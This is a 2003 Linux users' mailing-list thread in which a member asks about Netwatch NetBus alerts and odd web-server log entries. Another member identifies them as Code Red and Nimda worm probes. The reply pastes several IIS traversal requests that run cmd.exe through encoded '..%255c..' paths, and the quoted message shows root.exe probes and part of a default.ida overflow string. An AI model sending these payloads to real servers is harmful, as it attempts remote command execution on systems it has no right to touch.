Re: Netwatch 2

Subject: Re: Netwatch 2
From: The Alaskan Bear (akbear@akbearsden.com)
Date: Sun Feb 09 2003 - 00:31:43 AKST

From what I can tell, from what you just posted is the same thing I get off of
the logs from my webserver from the windows machines affected by code red and nimbus.
24.237.209.26 - - [01/Feb/2003:23:15:34 -0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:34 -0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:35 -0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:37 -0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:39 -0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:41 -0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:43 -0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"
24.237.209.26 - - [01/Feb/2003:23:15:45 -0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-"

These are just a few examples of the same thing. It looks like your NetBus has some sort of automail on warnings setup. 

---
Ted Montgomery 
The Alaskan Bear's Den
akbear@akbearsden.com
Registered Linux User: #253251
907-242-9824

-- There are some things lots of money can buy ... --
 
-- For everything else, there is LINUX ... --

On Sun, Feb 09, 2003 at 12:01:49AM -0900, Adam Elkins wrote:
> 
> Ok, it just happened again. Now that it's there, I can better describe it
> 
> New mail for root@net_slack has arrived:
> ----
> From: Mail Delivery Subsystem
> Subject: Returned mail: see transcript for details
> This is a MIME-encapsulated message
> 
> --1h9KGxT09600.1044821819/net_slack..
> 
> (at the bottom of the screen; 'NetBus from 192.168.1.42 ' which is my main 
> box)
> When I check the mail, it says:
> 
> *******************************************************
> WARNING MESSAGE from Netwatch 0.9g at Sun Feb 9
> 
> Netbus from 192.168.1.42    to 24.237.63.142  with len=40
> 45   0   0   28   ED   18   0   0   7D   6   36   6A   18
> [I don't feel like typing the rest
> *******************************************************
> 
> The table is 4 lines long, but you get the idea. I did a bit more research, 
> and found that Netwatch watches for NetBus/BackOrifice packets.
> The funny thing is, it's says it's comming from my other slack box.
> Just out of courisity, I checked the log for Apache on my other box.
> The ip in the mail was there (24.237.63.142) doing all types of these things:
> "GET /scripts/root.exe?/c+dir HTTP/1.1" 404 293
> There are 9 or so of these, all "GETing different things, including this which 
> seems very odd:
> "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNN%u909 [i don't feel like typing the rest]
> 
> 
> I really don't know what all this means. Can some one could exlplain what 
> going on here?
> 
> ---------
> To unsubscribe, send email to <aklug-request@aklug.org>
> with 'unsubscribe' in the message body.

---------
To unsubscribe, send email to <aklug-request@aklug.org>
with 'unsubscribe' in the message body.

This archive was generated by hypermail 2a23 : Sun Feb 09 2003 - 00:32:29 AKST